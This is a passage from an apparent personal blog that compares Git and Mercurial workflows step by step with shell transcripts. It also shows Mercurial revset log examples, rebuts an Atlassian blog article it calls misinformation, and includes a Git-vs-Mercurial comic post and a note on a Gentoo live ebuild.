(use "git add <file>..." to update what will be committed)
(use "git checkout -- <file>..." to discard changes in working directory)

modified:   1
no changes added to commit (use "git add" and/or "git commit -a")

ARGL… well, paste it in again…

git add 1
git commit -m "hack"

[master aba911a] hack
 1 file changed, 1 insertion(+), 1 deletion(-)

Finally I managed to commit my file. Now, let’s push it back.

2.2.3 Push it back

git push
warning: push.default is unset; its implicit value is changing in
Git 2.0 from 'matching' to 'simple'. To squelch this message
and maintain the current behavior after the default changes, use:

  git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

  git config --global push.default simple

See 'git help config' and search for 'push.default' for further information.
(the 'simple' mode was introduced in Git 1.7.11. Use the similar mode
'current' instead of 'simple' if you sometimes use older versions of Git)

Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)   
Writing objects: 100% (3/3)   
Writing objects: 100% (3/3), 222 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
To /tmp/gitflow/orig
master

HA! It’s in.

2.2.4 Overview

In short the required commands look like this:

  • git clone orig mine
  • cd mine; (hack)
  • git config user.name "contributor"
  • git config user.email "con@tribut.or"
  • git add 1
  • git commit -m "hack"
  • (request permission to push)
  • git push

dvcs-basic-git.png

compare Subversion:

./dvcs-basic-svn.png

Now let’s see what that initial setup with setting a non-master branch was about…

2.3 With testing

2.3.1 Test something

I want to test a change and ensure, that it works with a fresh clone. So I just clone my local repo and commit there.

cd ..
git clone mine test
cd test
# setup the user locally again. Normally you do not need that again, since you’d use --global.
git config user.email "contributor" 
git config user.name "con@tribut.or"
# hack and commit
echo test > 1
git add 1
echo # cosmetic
git commit -m "change to test" >/dev/null
# (run the tests)

2.3.2 Push it back

git push
warning: push.default is unset; its implicit value is changing in
Git 2.0 from 'matching' to 'simple'. To squelch this message
and maintain the current behavior after the default changes, use:

  git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

  git config --global push.default simple

See 'git help config' and search for 'push.default' for further information.
(the 'simple' mode was introduced in Git 1.7.11. Use the similar mode
'current' instead of 'simple' if you sometimes use older versions of Git)

Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)   
Writing objects: 100% (3/3)   
Writing objects: 100% (3/3), 234 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: error: refusing to update checked out branch: refs/heads/master        
remote: error: By default, updating the current branch in a non-bare repository        
remote: error: is denied, because it will make the index and work tree inconsistent        
remote: error: with what you pushed, and will require 'git reset --hard' to match        
remote: error: the work tree to HEAD.        
remote: error:         
remote: error: You can set 'receive.denyCurrentBranch' configuration variable to        
remote: error: 'ignore' or 'warn' in the remote repository to allow pushing into        
remote: error: its current branch; however, this is not recommended unless you        
remote: error: arranged to update its work tree to match what you pushed in some        
remote: error: other way.        
remote: error:         
remote: error: To squelch this message and still keep the default behaviour, set        
remote: error: 'receive.denyCurrentBranch' configuration variable to 'refuse'.        
To /tmp/gitflow/mine
master (branch is currently checked out)
error: failed to push some refs to '/tmp/gitflow/mine'

Uh… what? If I were a real first time user, at this point I would just send a patch…

The simple local test clone does not work: You actually have to also checkout a different branch if you want to be able to push back (needless duplication of information - and effort). And it actually breaks this simple workflow.

(experienced git users will now tell me that you should always checkout a work branch. But that would mean that I would have to add the additional branching step to the simplest case without testing repo, too, raising the bar for contribution even higher)

git checkout -b testing master
git push ../mine testing
Switched to a new branch 'testing'
Counting objects: 5, done.
(1/3)   
Writing objects: 66% (2/3) Writing objects: 100% (3/3) Writing objects: 100% (3/3), 234 bytes, done. : Total 3 (delta 0), reused 0 (delta 0) : To ../mine : testing

Since I only pushed to mine, I now have to go there, merge and push.

cd ../mine
git merge testing
git push
Updating aba911a..820dea8
Fast-forward
 1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
warning: push.default is unset; its implicit value is changing in
Git 2.0 from 'matching' to 'simple'. To squelch this message
and maintain the current behavior after the default changes, use:

  git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

  git config --global push.default simple

See 'git help config' and search for 'push.default' for further information.
(the 'simple' mode was introduced in Git 1.7.11. Use the similar mode
'current' instead of 'simple' if you sometimes use older versions of Git)

Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)   
Writing objects: 100% (3/3)   
Writing objects: 100% (3/3), 234 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
To /tmp/gitflow/orig
master

2.3.3 Overview

In short the required commands for testing look like this:

  • git clone mine test
  • cd test; (hack)
  • git add 1
  • git checkout -b testing master
  • git commit -m "hack"
  • git push ../mine testing
  • cd ../mine
  • git merge testing
  • git push

./dvcs-basic-git-testing.png

Compare to Subversion

./dvcs-basic-svn-testing.png

2.4 Wrapup

The git workflows broke at several places:

Simplest:

  • Set the username (minor: it’s just pasting shell commands)
  • Add every change (==staging. Minor: paste shell commands again - or use `commit -a`)

Testing clone (only additional breakages):

  • Cannot push to the local clone (major: it spews about 20 lines of error messages which do not tell me how to actually get my changes into the local clone)
  • Have to use a temporary branch in a local clone to be able to push back (annoyance: makes using clean local clones really annoying).

3Mercurial

Now let’s try the same

3.1 Setup the test

LC_ALL=C
LANG=C
PS1="$"
rm -rf /tmp/hgflow > /dev/null
mkdir -p /tmp/hgflow > /dev/null
cd /tmp/hgflow > /dev/null
# init the repo
hg init orig  > /dev/null
cd orig > /dev/null
echo 1 > 1 > /dev/null
# add a commit
hg add 1 > /dev/null
hg commit -u upstream -m 1 > /dev/null
cd .. >/dev/null
echo # purely cosmetic and implementation detail: this adds a new line to the output
ls
The most happy marriage I can imagine to myself would be the union
of a deaf man to a blind woman.
        -- Samuel Taylor Coleridge
arne@fluss ~/.emacs.d/private/journal $ arne@fluss ~/.emacs.d/private/journal $ $$$$$$$$$$$$
orig
hg --version

Mercurial Distributed SCM (version 2.5.2)
(see http://https://mercurial-scm.org for more information)

Copyright (C) 2005-2012 Matt Mackall and others
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

3.2 Simplest case

3.2.1 Get the repo

hg clone orig mine
echo $ ls
ls
updating to branch default
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ ls
mine  orig

3.2.2 Hack a bit

cd mine
echo 2 > 1
echo
# I disable the username to show the problem
hg --config ui.username= commit -m "hack" 

$
$abort: no username supplied (see "hg help config")

ARGL, what??? Mind the update at the top of this article: This is fixed in Mercurial 3.0

Well, let’s do what it says (but only see the first 30 lines to avoid blowing up this example):

hg help config | head -n 30 | grep -B 3 -A 1 per-repository
These files do not exist by default and you will have to create the
    appropriate configuration files yourself: global configuration like the
USERPROFILE%\mercurial.ini" or
HOME/.hgrc" and local configuration is put into the per-repository
/.hg/hgrc" file.

Are you serious??? I have to actually read a guide just to commit my change??? As normal user this would tip my frustration with the tool over the edge and likely get me to just send a patch… Mind the update at the top of this article: This is fixed in Mercurial 3.0

But I am no normal user, since I want to write this guide. So I assume a really patient user, who does the following (after reading for 3 minutes):

echo '[ui]
username = "contributor"' >> .hg/hgrc

and tries again:

hg commit -m "hack"

Now it worked. But this is MAJOR BREAKAGE. Mind the update at the top of this article: This is fixed in Mercurial 3.0

3.2.3 Push it back

hg push
pushing to /tmp/hgflow/orig
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files

Done. This was easy, and I did not get yelled at (different from the experience with git :) ).

3.2.4 Overview

In short the required commands look like this:

  • hg clone orig mine
  • cd mine; (hack)
  • hg help config ; (read) ; echo '[ui]

username = "contributor"' >> .hg/hgrc (are you serious?)

  • hg commit -m "hack"
  • (request permission to push)
  • hg push

dvcs-basic-hg.png

Compare to Subversion

./dvcs-basic-svn.png

and to git

./dvcs-basic-git.png

3.3 With testing

3.3.1 Test something

cd ..
hg clone mine test
cd test
# setup the user locally again. Normally you do not need that again, since you’d use --global.
echo '[ui]
username = "contributor"' >> .hg/hgrc
# hack and commit
echo test > 1
echo # cosmetic
hg commit -m "change to test"
# (run the tests)

updating to branch default
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$$> $$$

3.3.2 Push it back

hg push
pushing to /tmp/hgflow/mine
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files

It’s in mine now, but I still need to push it from there.

cd ../mine
hg push

pushing to /tmp/hgflow/orig
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files

Done.

If I had worked on mine in the meantime, I would have to merge there, too - just as with git with the exception that I would not have to give a branch name. But since we’re in the simplest case, we don’t need to do that.

3.3.3 Overview

In short the required commands for testing look like this:

  • hg clone mine test
  • cd test; (hack)
  • hg commit -m "hack"
  • hg push ../mine
  • cd ../mine
  • hg push

dvcs-basic-hg-testing.png

Compare to Subversion

./dvcs-basic-svn-testing.png

and to git

./dvcs-basic-git-testing.png

3.4 Wrapup

The Mercurial workflow broke only ONCE, but there it broke HARD: To commit you actually have to READ THE HELP PAGE on config to find out how to set your username.

So, to wrap it up: ARE YOU SERIOUS? Mind the update at the top of this article: This is fixed in Mercurial 3.0

That’s a really nice workflow, disturbed by a devastating user experience for just one of the commands.

This is a place where hg should learn from git: The initial setup must be possible from the commandline, without reading a help page and without changing to an editor and then back into the commandline.

4 Summary

  • Git broke at several places, and in one place it broke hard: Pushing between local clones is a huge hassle, even though that should be a strong point of DVCSs.
  • Mercurial broke only once, but there it broke hard: Setting the username actually requires reading help output and hand-editing a text file.

Also the workflows for a user who gets permission to push always required some additional steps compared to Subversion.

One of the additional steps cannot be avoided without losing offline-commits (which are a major strength of DVCS), because those make it necessary to split svn commit into commit and push: That separates storing changes from sharing them.

But git actually requires additional steps which are only necessary due to implementation details of its storage layer: Pushing to a repo with the same branch checked out is not allowed, so you have to create an additional branch in your local clone and merge it in the other repo, even if all your changes are siblings of the changes in the other repository, and it requires either a flag to every commit command or explicit adding of changes. That does not amount to the one unavoidable additional command, but actually further three commands, so the number of commands to get code, hack on it and share it increases from 5 to 9. And if you work in a team where people trust you to write good code, that does not actually reduce the required effort to share your changes.

On the other hand, both Mercurial and Git allow you to work offline, and you can do as many testing steps in between as you like, without needing to get the changes from the server every time (because you can simply clone a local repo for that).

4.1 Visually

4.1.1 Subversion

./dvcs-basic-svn-testing.png

4.1.2 Mercurial

./dvcs-basic-hg-testing.png

4.1.3 Git

./dvcs-basic-git-testing.png

Date: 2013-04-17T20:39+0200

Author: Arne Babenhauserheide

Org version 7.9.2 with Emacs version 24

Validate XHTML 1.0
AnhangGröße
dvcs-basic-svn.png2.53 KB
dvcs-basic-svn-testing.png2.68 KB
dvcs-basic-hg.png2.72 KB
dvcs-basic-hg-testing.png3.08 KB
dvcs-basic-git.png2.89 KB
dvcs-basic-git-testing.png3.95 KB
2013-04-17-Mi-basic-usecase-dvcs.org13.02 KB
2013-04-17-Mi-basic-usecase-dvcs.pdf274.67 KB

Creating nice logs with revsets in Mercurial

In the mercurial list Stanimir Stamenkov asked how to get rid of intermediate merges in the log to simplify reading the history (and to not care about missing some of the details).

Update: Since Mercurial 2.4 you can simply use
hg log -Gr "branchpoint()"

I did some tests for that and I think the nicest representation I found is this:

hg log -Gr "(all() - merge()) or head()"

This article shows examples for this. To find more revset options, run hg help revsets.

The result

It showed that in the end the revisions converged again - and it shows the actual states of the development.

$ hg log -Gr "(all() - merge()) or head()"

@    Änderung:        7:52fe4a8ec3cc
|\   Marke:           tip
| |  Vorgänger:       6:7d3026216270
| |  Vorgänger:       5:848c390645ac
| |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| |  Datum:           Tue Aug 14 15:09:54 2012 +0200
| |  Zusammenfassung: merge
| |
| \
| |\
| | o  Änderung:        3:55ba56aa8299
| | |  Vorgänger:       0:385d95ab1fea
| | |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| | |  Datum:           Tue Aug 14 15:09:40 2012 +0200
| | |  Zusammenfassung: 4
| | |
| o |  Änderung:        2:b500d0a90d40
| |/   Vorgänger:       0:385d95ab1fea
| |    Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| |    Datum:           Tue Aug 14 15:09:39 2012 +0200
| |    Zusammenfassung: 3
| |
o |  Änderung:        1:8cc66166edc9
|/   Nutzer:          Arne Babenhauserheide <bab@draketo.de>
|    Datum:           Tue Aug 14 15:09:38 2012 +0200
|    Zusammenfassung: 2
|
o  Änderung:        0:385d95ab1fea
   Nutzer:          Arne Babenhauserheide <bab@draketo.de>
   Datum:           Tue Aug 14 15:09:38 2012 +0200
   Zusammenfassung: 1

Even shorter, but not quite correct

The shortest representation is without the heads, though. It does not represent the current state of development if the last commit was a merge or if some branches were not merged. Otherwise it is equivalent.

$ hg log -Gr "(all() - merge())"

o  Änderung:        3:55ba56aa8299
|  Vorgänger:       0:385d95ab1fea
|  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
|  Datum:           Tue Aug 14 15:09:40 2012 +0200
|  Zusammenfassung: 4
|
| o  Änderung:        2:b500d0a90d40
|/   Vorgänger:       0:385d95ab1fea
|    Nutzer:          Arne Babenhauserheide <bab@draketo.de>
|    Datum:           Tue Aug 14 15:09:39 2012 +0200
|    Zusammenfassung: 3
|
| o  Änderung:        1:8cc66166edc9
|/   Nutzer:          Arne Babenhauserheide <bab@draketo.de>
|    Datum:           Tue Aug 14 15:09:38 2012 +0200
|    Zusammenfassung: 2
|
o  Änderung:        0:385d95ab1fea
   Nutzer:          Arne Babenhauserheide <bab@draketo.de>
   Datum:           Tue Aug 14 15:09:38 2012 +0200
   Zusammenfassung: 1

The basic log For reference

The vanilla-log looks like this:

$ hg log -G

@    Änderung:        7:52fe4a8ec3cc
|\   Marke:           tip
| |  Vorgänger:       6:7d3026216270
| |  Vorgänger:       5:848c390645ac
| |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| |  Datum:           Tue Aug 14 15:09:54 2012 +0200
| |  Zusammenfassung: merge
| |
| o    Änderung:        6:7d3026216270
| |\   Vorgänger:       2:b500d0a90d40
| | |  Vorgänger:       4:8dbc55213c9f
| | |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| | |  Datum:           Tue Aug 14 15:09:45 2012 +0200
| | |  Zusammenfassung: merged 4
| | |
o | |  Änderung:        5:848c390645ac
|\| |  Vorgänger:       3:55ba56aa8299
| | |  Vorgänger:       2:b500d0a90d40
| | |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| | |  Datum:           Tue Aug 14 15:09:43 2012 +0200
| | |  Zusammenfassung: merged 2
| | |
+---o  Änderung:        4:8dbc55213c9f
| | |  Vorgänger:       3:55ba56aa8299
| | |  Vorgänger:       1:8cc66166edc9
| | |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| | |  Datum:           Tue Aug 14 15:09:41 2012 +0200
| | |  Zusammenfassung: merged 1
| | |
o | |  Änderung:        3:55ba56aa8299
| | |  Vorgänger:       0:385d95ab1fea
| | |  Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| | |  Datum:           Tue Aug 14 15:09:40 2012 +0200
| | |  Zusammenfassung: 4
| | |
| o |  Änderung:        2:b500d0a90d40
|/ /   Vorgänger:       0:385d95ab1fea
| |    Nutzer:          Arne Babenhauserheide <bab@draketo.de>
| |    Datum:           Tue Aug 14 15:09:39 2012 +0200
| |    Zusammenfassung: 3
| |
| o  Änderung:        1:8cc66166edc9
|/   Nutzer:          Arne Babenhauserheide <bab@draketo.de>
|    Datum:           Tue Aug 14 15:09:38 2012 +0200
|    Zusammenfassung: 2
|
o  Änderung:        0:385d95ab1fea
   Nutzer:          Arne Babenhauserheide <bab@draketo.de>
   Datum:           Tue Aug 14 15:09:38 2012 +0200
   Zusammenfassung: 1

Creating the test repo

To create the test repo, I just used a few short loops in the shell:

hg init test ; cd test 
for i in 1 2 3 4; do echo $i > $i ; hg ci -Am "$i"; hg up -r -$i; done
for i in 1 2 3 4; do echo $i > $i ; hg ci -Am "$i"; hg up -r -$i; hg merge $i ; hg ci -m "merged $i"; done
for i in $(hg heads --template "{node} ") ; do hg merge $i ; hg ci -m "merge"; done

Better representations?

Do you have better representations for viewing convoluted history?

PS: Yes, you can rewrite history, but that’s a really bad idea if you have many people who closely interact and publish early and often.

Factual Errors in “Git vs Mercurial: Why Git?” -- and corrections shown by example

Update 2016: Instead of fixing the article, the Atlassian web workers removed the comments which point out the misinformation in the article. *sigh*

Summary:

In the Atlassian Blog, a Git proponent spread blatant misinformation which the Atlassian folks are leaving uncommented even though the falseness has been shown by multiple people and even in examples in the article itself.

The claims and corrections:

  • Claim: Git never loses unreferenced data. Mercurial needs special handling to retrieve unreferenced data. Reality: Due to automatic garbage collection, history editing in git unpredictably loses unreferenced history while Mercurial stores permanent backups which can be retrieved with core commands.
  • Claim: Only git branches are namespaced. Reality: Mercurial bookmarks are namespaced with bookmark@path, when there could be confusion. This is equivalent to git’s use of path/branch, but only used where it is needed, while git forces the user to always make that distinction.
  • Claim: Only git can provide a staging area. Reality: Activating mercurial queues (mq) and the record extension provides a staging area like the git index — for those who want it.
  • Claim: Git is more powerful. Reality: Both have the same raw power (as proven by transparent access with Mercurial to Git repos via hg-git), but
  • its “cuddly command line” gives Mercurial an efficiency during actual usage which most people do not find in Git.

2 years ago, Atlassian developer Charles O’Farrell published the article Git vs. Mercurial: Why Git? in which he claimed to show "the winning side of Git”. This article was part of the Dev Tools series at Atlassian and written as a reply to the article Why Mercurial?. It was spiced with so much misinformation about Mercurial (statements which were factually wrong) that the comments exploded right away. But the article was never corrected. Just now I was referred to the text again, and I decided to do what I should have done 2 years ago: Write an answer which debunks the myths.

“I also think that git isn’t the most beginner-friendly program. That’s why I’m only using its elementary features” — “I hear that from many git-users …” — part of the discussion which got me to write this article

Safer history and rewriting history with Git

Charles starts off by contradicting himself: He claims that git is safer, because it “actually never lets you change anything” - and goes on to explain, that all unreferenced data can be garbage collected after 30 days. Since nowadays the git garbage collector runs automatically, all unreferenced changes are lost after approximately 30 days.

This obviously means that git does allow you to change something. That this change only becomes irreversible after 30 days is an implementation detail which you have to keep in mind if you want to be safe.1

He then goes on to say how this allows for easy history rewriting with the interactive rebase and correctly includes, that the histedit extension of Mercurial allows you to do the same. (He also mentions the Mercurial Queues Extension (mq), just to admit that it is not the equivalent of git rebase -i but instead provides a staging area for future commits).

Then he starts the FUD2: Since histedit stores its backup in an external file, he asks rhetorically what new commands he would have to learn to restore it.

Dear reader, what new command might be required to pull data out of a backup? Something like git ref? Something like git reflog to find it and then something else?

Turns out, this is as easy and consistent as most things in Mercurial: Backup bundles can be treated just like repositories: To restore the changes, simply use

hg pull backup.bundle

So, all FUD removed, his take on safer history and rewriting history is reduced to “in hg it’s different, and potentially confusing features are shipped as extensions. Recovering changes from backups is consistent with your day-to-day usage of hg”.

(note that the flexibility of hg also enables the creation of extensions like mutable hg which avoids all the potential race conditions with git rebase - even for code you share between repositories (which is a total no-go in git), with a safety net which warns you if you try to change published history; thanks to the core feature phases)

Branching

On branching Charles goes deep into misinformation: He wrote his article in the year 2012, when Mercurial had already provided named branches as well as anonymous branching for 6 years, and one year after bookmarks became a core feature in hg 1.8, and he kept talking about how Mercurial advised to keep one clone per branch by referencing to a blog post which incorrectly assumed that the hg developers were using that workflow (obviously he did not bother to check that claim). Also he went on clamoring, that bookmarks initially could not be pushed between repositories, and how they were added “due to popular demand”. The reality is, that at some point a developer simply said “I’ll write that”. And within a few months, he implemented the equivalent of git branches. Before that, no hg developer saw enough need for them to excert that effort and today most still simply use named branches.

But obviously Charles could not imagine named branches to work, so he kept talking about how bookmarks do not have namespaces while git branches have them, and that this would create confusion. He showed the following example for git and Mercurial (shortened here):

* 9e4b1b8 (origin/master, origin/test) Remove unused variable
| * 565ad9c (HEAD, master) Added Hello example
|/
* 46f0ac9 Initial commit

and

o  changeset:   2:67deb4acba33
|  bookmark:    master@default
|  summary:     Third commit
|
| @  changeset:   1:2d479c025719
|/   bookmark:    master
|    summary:     Second commit
|
o  changeset:   0:e0e024ff06ad
   summary:     First commit

Then he asked: “would the real master branch please stand up?”

Let’s try to answer that:

Git: there is a commit marked as (origin/master, origin/test), and one marked as (HEAD, master). If you know that origin is the canonical remote repository in git, then you can guess, that the names prefixed with origin/ come from the remote repository.

Mercurial: There is a commit with the bookmark master@default and one with the bookmark master. When you know that default is the canonical remote repository in Mercurial, then you can guess, that the bookmark postfixed with @default comes from the remote repository.

But Charles concludes his example with the sentence: “Because there is no notion of namespaces, we have no way of knowing which bookmarks are local and which ones are remote, and depending on what we call them, we might start running into conflicts.”

And this is not only FUD, it is factually wrong and disproven in his own example. After this, I cannot understand how anyone could take his text seriously.

But he goes on.

Staging

His final misinformation is about the git index - a staging area for uncommitted changes. He correctly identifies the index as “one of the things that people either love or hate about Git”. As Mercurial cares a lot about giving newcomers a safe environment to work in, it ships this controversial feature as extension and not as core command.

Charles now claims that the equivalent of the git index is the record extension - and then complains that it does not imitate the index exactly, because it does not give a staging area but rather allows committing partial changes. Instead of now turning towards the Mercurial Queues Extension which he mentioned earlier as staging area for commits, he asserts that record cannot provide the same feature as git.

Not very surprisingly, when you have an extension to provide partial commits (record) and one to provide a staging area (mq), if you want both, you simply activate both extensions. When you do that, Mercurial offers the qrecord command which stores partial changes in the current staging area.

Not mentioning this is simply a matter of not having done proper research for his article - and not updating the post means that he intentionally continues to spread misinformation.

Blame

The only thing he got right is that git blame is able to reconstruct copies of code from one file to another.

Mercurial provides this for renamed files, but not for directly copy-pasted lines. Analysis of the commits would naturally allow doing the same, and all the information for that is available, but this is not implemented yet. If people ask for it loud enough, it will only be a matter of time, though. As bookmarks showed, the Mercurial code base is clean enough that it suffices to have a single developer who steps up and creates an extension for this. If enough people use it, the extension can become a core feature later on.

Conclusion

“There is a reason why hg users tend to talk less about hg: There is no need to talk about it that much.” — Arne Babenhauserheide as answer to Why Mercurial?

Charles concludes with “Git means never having to say, you should have”, and “Mercurial feels like Git lite”. Since he obviously did not do his research on Mercurial while he took the time to acquire in-depth knowledge of git, it’s quite understandable that he thinks this. But it is no base for writing an article - especially not for Atlassian, the most prominent Mercurial hosting provider since their acquisition of Bitbucket, which grew big as pure Mercurial hoster and added git after being acquired by Atlassian.

He then manages to finish his article with one more unfounded smoke bomb: The repository format drives what is possible with our DVCS tools, now and in the future.

While this statement actually is true, in the context of git-vs-mercurial it is a horrible misfit: The hg-git extension shows since 2009, 3 years before Charles wrote his article, that it is possible to convert transparently from git to Mercurial and back. So the repository format of Mercurial has all capabilities of the repository format of git - and since git cannot natively store named branches, represent branches with multiple heads or push changes into a checked out branch, the capabilities of the repository format of Mercurial are actually a superset of the capabilities of the storage format of Git.

But what he also states is that “there are more important things than having a cuddly command line”. And this is the final misleading statement to debunk: While the command line does not determine what is theoretically possible with the tool, it does determine what regular users can do with it. The horrible command line of git likely contributes to the many git users who never use anything but commit -a, push and pull - and to the proliferation of git gurus whom the normal users call when git shot them into their foot again.

It’s sad when someone uses his writing skills to wrap FUD and misinformation into pretty packaging to get people to take his side. Even more sad is, that this often works for quite some time and that few people read the comments section.3

And now that I finished debunking the article, there is one final thing I want to share. It is a quote from the discussion which prompted me to write this piece:

<…> btw. I also think that git isn’t the most beginner-friendly program.
<…> That’s why I’m only using its elementary features
<ArneBab> I hear that from many git-users…
<…> oh, maybe I should have another look at hg after all

This is a translation of the real quote in German:

<…> ich finde btw auch dass git nicht gerade das anfängerfreundlichste programm ist
<…> darum nutze ich das auch nur recht rudimentär
<ArneBab> das höre ich von vielen git-Nutzern…
<…> oha. nagut, dann sollte ich mir hg vielleicht doch nochmal ansehen

Note: hg is short for Mercurial. It is how Mercurial is called on the command line.

Footnotes:

1

Garbage collection after 30 days means that you have to remember additional information while you work. And that is a problem: You waste resources which would be better spent on the code you write. A DVCS should be about having to remember less, because your DVCS keeps the state for you.

2

FUD means fear-uncertainty-doubt and is a pretty common technique used to discredit things when one has no real arguments: Instead of giving a clear argument which can be debunked, just make some vague hints that something might be wrong or that there might be some deficiency or danger. Most readers will never check this and so this establishes the notion that something IS wrong.

3

Lesson learned: If you take the time to debunk something in the comments, be sure to also write an article about it. Otherwise you might find the same misinformation still being spread 2 years later by the same people. When Atlassian bought Bitbucket, that essentially amounted to a hostile takeover of a Mercurial team by git-zealots. And they got away with this, because too few people called them up on it in public.

BitBucket got big on Mercurial — until they got bought by Atlassian

A comment on largefile support missing in BitBucket, despite being a much-requested feature since 2012.

Note that it’s not Atlassian which got big with Mercurial. It’s Bitbucket which got big with Mercurial, and it was later bought by Atlassian. Also Atlassian is still spreading lies about Mercurial in the Atlassian blog by hosting a guest entry by a git zealot which is filled with factual errors, some even disproven in the examples in the article. Despite being called out on that in public, they did not even see the need to add a note to that guest entry about misunderstanding by the author.

I asked their marketing team personally several times to correct this. I know they read it, because people I used to collaborate with work at the BitBucket Mercurial support.

Dear BitBucket, this is where you could be: Virtuos Games uses BitTorrentSync with Mercurial for game development using decentralized large asset storage.

I guess they show that there is room for a Mercurial hosting company. Maybe it will be kiln.

I‘m sorry for the great Mercurial developers working at Atlassian to improve Mercurial support. I know you’re doing great work and I hope you will prove me wrong on this. But from the outside it seems like you’re being used to hide hostility by the parent company against the core part of their own product. “…we decided to collaborate with GitHub on building a standard for large file support” — seriously? There is already a standard for large file support which has been part of Mercurial core since 2011, and works almost seamlessly. It just needs support from BitBucket to be easier for BitBucket users.

This crazyness is a new spin on never trust a company: never ever trust a zealot with a tool which helps “the other side”: They are prone to even put zeal over business. For everyone at BitBucket: If this isn’t a wakeup call, I don’t know what is.

And if you like Git and are happy for a competitor to get weakened: To you really want your tool to win by spreading intentional misinformation? Wouldn’t you feel more at ease seeing your tool win by merit of better technology, not by buying companies which support other tools and then starving them down and forcing them to badmouth their own technology?

git vs. hg - offensive

In many discussions on DVCS over the years I have been fair, friendly and technical while receiving vitriol and misinformation and FUD. This strip visualizes the impression which stuck to my mind when speaking with casual git-users.

Update: I found a very calm discussion at a place where I did not expect it: reddit. I’m sorry to you, guys. Thank you for proving that a constructive discussion is possible from both sides! I hope that you are not among the ones offended by this strip.

To Hg-users: There are git users who really understand what they are doing and who stick to arguments and friendly competition. This comic arose from the many frustrating experiences with the many other git users. Please don’t let this strip trick you into going down to non-constructive arguments. Let’s stay friendly. I already feel slightly bad about this short move into competition-like visualization for a topic where I much prefer friendly, constructive discussions. But it sucks to see contributors stumble over git, so I think it was time for this.

»I also think that git isn’t the most beginner-friendly program. That’s why I’m using only its elementary features«

git vs. hg - offensive

To put the strip in words, let’s complete the quote:

»I also think that git isn’t the most beginner-friendly program.
That’s why I’m using only its elementary features«
<ArneBab> I hear that from many git-users…
»oh, maybe I should have another look at hg after all«

Why this?

Because there are far too many Git-Users who only dare using the most basic commands which makes git at best useless and at worst harmful.

This is not the fault of the users. It is the fault of the tool.

This strip is horrible!

If you are offended by this strip: You knew the title when you came here, right?

And if you are offended enough, that you want to make your own strip and set things right, go grab the source-file, fire up krita and go for it! This strip is free.1

Commentary

If you feel that this strip fits Mercurial and Git perfectly, keep in mind, that this is only one aspect of the situation, and that using Git is still much better than being forced to use centralized or proprietary version tracking (and people who survive the initial phase mostly unscarred can actually do the same with Git as they could with Mercurial).

And Mercurial also has its share of problems - even horrible ones (update 2014: These were fixed in version 3.0) - but compared to Git it is a wonder of usability.

And in case this strip does not apply to your usage of Git: there are far too many people whose experience it fits - and this should not be the case for the most widespread system for accessing the code of free software projects.

(and should this strip be completely unintelligible to you: curse a world in which the concept of monofilament whips isn’t mainstream ☺ — let’s get more people to play Shadowrun)

The way forward

So if you are one of the people, who mostly use commit, pull and push, and turn to a Git-Guru when things break, then you might want to kiss the Git-Guru goodbye and give Mercurial a try.

By the way: the extensions named in the Final Round are record, mutable and infocalypse: Select the changes to commit on a hunk-by-hunk base, change history with automatic conflict resolution (even for rebase) and collaborate anonymously over Freenet.

And if you are one of the Git Gurus who claim that squashing attacking Ninjas is only possible with Git, have a look what a Firefox-contributor and former long-term Git-User and a Facebook infrastructure developer have to say about this.


  1. All the graphics in this strip are available under free licenses: creative-commons attribution or GPLv3 or later — you decide which of those you use. If it is cc attribution, call me Arne Babenhauserheide and link to this article. You’ll find all the sources as well as some preliminary works and SVGs in git-vs-hg-offensive.tar_.gz or git-vs-hg-offensive.zip (whichever you prefer)

    cc by GPLv3

AnhangGröße
git-vs-hg-offensive-purevector-retouch2.png184.31 KB
git-vs-hg-offensive.tar_.gz22.59 MB
git-vs-hg-offensive.zip22.62 MB
git-vs-hg-offensive.png185.98 KB
git-vs-hg-offensive-purevector-retouch2.kra377.58 KB
git-vs-hg-offensive-thumb.jpg11.3 KB
git-vs-hg-offensive-thumb-240x240.jpg11.78 KB

Gentoo live ebuild for Mercurial

We (nelchael and me) just finished a live ebuild for Mercurial which allows to conveniently track the main (mpm) repo of Mercurial in Gentoo.

To use the ebuild, just add

=dev-util/mercurial-9999 **  

to your package.keywords and emerge mercurial (again).

It took us a while since we had to revise the Mercurial eclass to always build Mercurial live packages from their Mercurial repository and nelchael took the chance to completely overhaul the eclass.

If you're interested in the details, please have a look at the ebuild and the eclass as well as the tracking bug.

To use the eclass in an ebuild, just add inherit mercurial at the beginning of the ebuild and set EHG_REPO_URI to the correct repository URI. If you need to share a single repository between several ebuilds, set EHG_PROJECT to the project name in all of them.

Have fun with Mercurial!

Learning Mercurial in Workflows

The official workflow guide for Mercurial, mirrored from mercurial-scm.org/guide. License: GPLv2 or later.

It delves into nonlinear history and merging right from the beginning and uses only features you get without activating extensions. Due to this it offers efficient and safe workflows without danger of losing already committed work.

With Mercurial you can use a multitude of different workflows. This page shows some of them, including their use cases. It is intended to make it easy for beginners of version tracking to get going instantly and learn completely incrementally. It doesn't explain the concepts used, because there are already many other great resources doing that, for example the wiki and the hgbook.

